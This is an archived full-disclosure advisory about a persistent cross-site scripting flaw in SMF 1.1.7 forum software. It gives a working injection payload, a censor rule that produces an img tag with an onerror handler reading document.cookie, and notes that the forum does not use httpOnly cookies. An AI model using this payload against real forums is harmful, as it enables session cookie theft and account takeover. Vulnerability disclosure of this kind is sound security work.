TUCoPS :: HP Unsorted S :: va2503.htm

SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 Persistent XSS (requires permision to edit censor)
SMF 1.1.7 Persistent XSS (requires permision to edit censor)

SMF 1.1.7 (simplemachines.org) XSS


If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie) 

And then write a post, modify your signature, or send a PM with the code:

And the HTML code generated will be..
src="http://www.test-xss/" onerror="alert(document.cookie)" 
alt="" border="0" />

 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

-- Eduardo

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